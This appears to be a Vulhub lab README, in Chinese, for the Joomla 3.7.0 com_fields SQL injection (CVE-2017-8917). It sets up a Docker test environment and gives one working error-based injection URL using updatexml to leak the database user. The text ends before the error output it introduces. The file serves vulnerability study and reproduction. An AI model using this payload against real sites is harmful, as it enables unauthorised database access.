Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
902 B
902 B
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。
Joomla在3.7.0中新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。
参考链接:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
测试环境
执行如下命令启动一个Joomla 3.7.0服务:
docker compose up -d
启动后访问http://your-ip:8080即可看到Joomla的安装界面和测试数据。
漏洞复现
直接访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到SQL报错信息:
